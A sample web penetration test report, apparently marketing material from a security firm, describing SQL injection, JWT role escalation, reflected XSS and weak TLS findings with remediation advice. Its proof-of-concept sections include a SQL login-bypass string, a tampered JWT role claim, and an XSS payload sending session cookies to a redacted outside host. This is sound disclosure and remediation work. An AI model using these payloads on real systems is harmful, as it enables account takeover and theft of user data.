Sample Pentest Report — Zero Delta Security

1

Critical

1

High

2

Medium

3

Low

4

Info

Zero Delta Security conducted a black-box web application penetration test of the client's primary e-commerce platform between March 10–14, 2025. The engagement targeted authentication, session management, input handling, access controls, and API endpoints in scope as defined by the client.

The assessment identified 11 findings across the severity spectrum, including one Critical vulnerability (SQL Injection in the login endpoint) that would allow an unauthenticated attacker to extract the full customer database, bypass authentication entirely, and potentially escalate to remote code execution on the underlying server. This finding requires immediate remediation.

Additionally, a High-severity broken access control vulnerability allows any authenticated user to elevate privileges to an administrative role by modifying a single JWT claim. This finding was validated end-to-end and confirmed to grant full admin panel access to arbitrary user accounts.

The two Medium-severity findings — a reflected XSS in the search function and weak TLS configuration — represent meaningful risk, particularly the XSS given the platform handles payment data. The Low and Informational findings are documented for completeness and should be addressed in the normal patch cadence.

Overall security posture: Needs Immediate Attention. The Critical and High findings must be remediated before this system processes production traffic. We estimate both can be resolved within 1–2 engineering sprints with the guidance provided in Section 4.

Critical

SQL Injection — Authentication Endpoint

ID: ZDS-001 OWASP: A03:2021 CWE: CWE-89 Endpoint: POST /api/auth/login

9.8

CVSS v3.1

Description

The login endpoint concatenates user-supplied input directly into a SQL query without parameterization. An attacker can manipulate the query structure to bypass authentication, extract arbitrary data from the database, or — on certain database configurations — write files and execute operating system commands.

Business Impact

Full authentication bypass — attacker logs in as any user including admins
Complete database extraction — all customer PII, payment tokens, and order history exposed
Potential RCE via xp_cmdshell or INTO OUTFILE depending on database config
Immediate GDPR/PCI-DSS breach notification obligations if exploited

Proof of Concept (Redacted)

                                    HTTP Request — Authentication Bypass
POST /api/auth/login HTTP/1.1
Host: ████████████████████████
Content-Type: application/json

{
  "email": "' OR '1'='1' -- ",
  "password": "████████████"
}


                                

⚠ Exploitation confirmed in staging environment. Production endpoint not tested per rules of engagement.

Remediation Steps

Replace all string-concatenated queries with parameterized statements or prepared statements. In Node.js/pg: use pool.query('SELECT * FROM users WHERE email = $1', [email])
Audit all database query construction across the codebase — this pattern may appear in other endpoints. Run a static analysis scan (Semgrep rule sql-injection) to catch all instances.
Enable Web Application Firewall (WAF) rules for SQL injection patterns as a defense-in-depth layer while remediation is in progress.
After fixing, re-run penetration test on affected endpoints to validate remediation.

High

Broken Access Control — JWT Role Escalation

ID: ZDS-002 OWASP: A01:2021 CWE: CWE-285 Endpoint: All authenticated routes

8.8

CVSS v3.1

Description

JSON Web Tokens are signed but the server trusts the role claim from the token payload without server-side validation. An authenticated attacker can decode the JWT, modify the role field to "admin", and re-encode the token. The server accepts the modified token and grants full administrative access.

Business Impact

Any registered user can elevate to admin — exposing full order history, customer PII, financial dashboards
Admin functions include bulk export, user management, refund issuance
An attacker with admin access can issue fraudulent refunds or exfiltrate all customer data systematically
No audit trail distinguishing legitimate admin activity from attacker activity

Proof of Concept (Redacted)

                                    JWT Payload Manipulation
# Original decoded JWT payload:
{"sub": "████████", "email": "attacker@test.com", "role": "user", "iat": 1741900000}

# Modified payload (role changed to admin):
{"sub": "████████", "email": "attacker@test.com", "role": "admin", "iat": 1741900000}

# Re-encoded token accepted — admin dashboard loaded.
GET /admin/dashboard → HTTP 200 (Full admin access confirmed)
                                

Remediation Steps

Never trust role claims from the JWT payload. Roles must be looked up from the database on each request: SELECT role FROM users WHERE id = jwt.sub
If role caching is required for performance, use server-side sessions or a short-TTL Redis cache keyed by user ID — never the client-supplied token.
Implement a comprehensive authorization middleware that validates roles against the database before every privileged operation.
Rotate all existing JWT signing keys immediately — any currently-issued tokens with manipulated roles should be invalidated.

Medium

Reflected XSS — Product Search Function

ID: ZDS-003 OWASP: A03:2021 CWE: CWE-79 Endpoint: GET /search?q=

6.1

CVSS v3.1

Description

The product search endpoint reflects the user-supplied q parameter directly into the HTML response without encoding. An attacker can craft a malicious URL containing JavaScript that executes in the victim's browser when they click the link. Given this is a payment-handling application, session hijacking and payment credential theft are viable attack chains.

Business Impact

Session cookie theft enabling account takeover at scale via phishing campaign
DOM manipulation to redirect payment forms to attacker-controlled infrastructure
Keylogging of passwords and payment card details during checkout flow
High impact given PCI-DSS scope — XSS on a payment page can trigger assessor escalation

Proof of Concept (Redacted)

                                    Reflected XSS Payload
GET /search?q=<script>document.location='https://████/steal?c='+document.cookie</script>

Remediation Steps

HTML-encode all user-supplied data before rendering in the response. Use a templating engine with auto-escaping (Handlebars, Pug, EJS with <%= %>).
Implement a Content Security Policy (CSP) header that blocks inline scripts and restricts script sources to your own domain.
Set the HttpOnly and Secure flags on session cookies to prevent JavaScript access to cookie values.
Add SameSite=Strict to session cookies as an additional CSRF/hijack mitigation.

Medium

Weak TLS Configuration — Deprecated Protocol Support

ID: ZDS-004 OWASP: A02:2021 CWE: CWE-326 Endpoint: acme-redacted.com:443

5.9

CVSS v3.1

Description

The server supports TLS 1.0 and TLS 1.1 in addition to TLS 1.2 and 1.3. Both TLS 1.0 and 1.1 are deprecated (RFC 8996) and contain known vulnerabilities including POODLE and BEAST. Several cipher suites offered include RC4 and 3DES, which are cryptographically weak and susceptible to practical attacks.

Business Impact

A network-level attacker (e.g., on shared WiFi) can downgrade TLS to 1.0 and decrypt traffic via POODLE
PCI-DSS 4.0 explicitly requires TLS 1.2+ — this configuration fails compliance
Browser clients connecting over TLS 1.0 may see security warnings in Chrome/Firefox
Weak ciphers allow feasible brute-force decryption of recorded sessions

Proof of Concept

                                    TLS Scan Output (testssl.sh)
Protocol    TLS 1.0   offered (deprecated, VULNERABLE to BEAST/POODLE)
Protocol    TLS 1.1   offered (deprecated)
Protocol    TLS 1.2   offered
Protocol    TLS 1.3   offered
Cipher      RC4       OFFERED (NOT ok) — stream cipher, broken
Cipher      3DES      OFFERED (NOT ok) — SWEET32 attack viable
Cipher      AES-128-GCM  offered (OK)
Cipher      AES-256-GCM  offered (OK)
                                

Remediation Steps

Disable TLS 1.0 and TLS 1.1 in your web server/CDN configuration. For nginx: ssl_protocols TLSv1.2 TLSv1.3;
Remove RC4 and 3DES from the cipher suite list. Use Mozilla's SSL Configuration Generator (Modern or Intermediate preset) as your baseline.
Enable HSTS (HTTP Strict Transport Security) with a long max-age to prevent protocol downgrade attacks.
Re-run testssl.sh or ssllabs.com/ssltest after changes to confirm the A+ rating.

Findings are plotted by Likelihood (probability of exploitation) vs Impact (business consequence if exploited). Risk score drives remediation priority independent of CVSS.

	Negligible	Minor	Moderate	Significant	Catastrophic
Certain	MED	HIGH	HIGH	CRIT ZDS-001	CRIT
Likely	LOW	MED	HIGH ZDS-002	CRIT	CRIT
Possible	INFO	LOW	MED ZDS-003/004	HIGH	CRIT
Unlikely	INFO	INFO	LOW	MED	HIGH

↑ Likelihood axis (rows) · → Impact axis (columns)

Remediation items sequenced by risk priority. Sprint estimate assumes a 2-engineer team. Effort rating: ● = 0.5 days, ●●● = 1.5 days, ●●●●● = 3+ days.

ID	Finding	Priority	Sprint	Owner
ZDS-001	SQL Injection — Auth Endpoint	P1 — Immediate	Sprint 1	Backend Dev
ZDS-002	JWT Role Escalation	P1 — Immediate	Sprint 1	Backend Dev
ZDS-003	Reflected XSS — Search	P2 — High	Sprint 1–2	Frontend Dev
ZDS-004	Weak TLS Configuration	P2 — High	Sprint 2	DevOps / Infra
ZDS-005–007	Low severity findings (3 items)	P3 — Medium	Sprint 3	Backend Dev
ZDS-008–011	Informational items (4 items)	P4 — Low	Backlog	Any dev

Engagement Details

Testing Type Black Box

Start Date 2025-03-10

End Date 2025-03-14

Tester Certification OSCP, CEH

Framework OWASP + NIST 800-115

Total Scope 1 domain, 3 subdomains

Tools Used

Reconnaissance Amass, Shodan, Subfinder

Vulnerability Scanning Burp Suite Pro

SQL Injection sqlmap (manual verified)

TLS Analysis testssl.sh, SSL Labs

Auth/JWT Testing jwt_tool, Burp Decoder

Reporting Zero Delta proprietary

CVSS Scoring Reference

Critical 9.0 – 10.0

High 7.0 – 8.9

Medium 4.0 – 6.9

Low 0.1 – 3.9

Informational 0.0

Document Control

Classification CONFIDENTIAL

Distribution Client Only

Retention 3 years

Version v1.2 Final

Retest Included Yes (30 days)

This is what you actually get.

Security Assessment Report

SQL Injection — Authentication Endpoint

Description

Business Impact

Proof of Concept (Redacted)

Remediation Steps

Broken Access Control — JWT Role Escalation

Description

Business Impact

Proof of Concept (Redacted)

Remediation Steps

Reflected XSS — Product Search Function

Description

Business Impact

Proof of Concept (Redacted)

Remediation Steps

Weak TLS Configuration — Deprecated Protocol Support

Description

Business Impact

Proof of Concept

Remediation Steps

Engagement Details

Tools Used

CVSS Scoring Reference

Document Control

Get this report as a PDF.

Report sent.

Start with a free attack surface scan.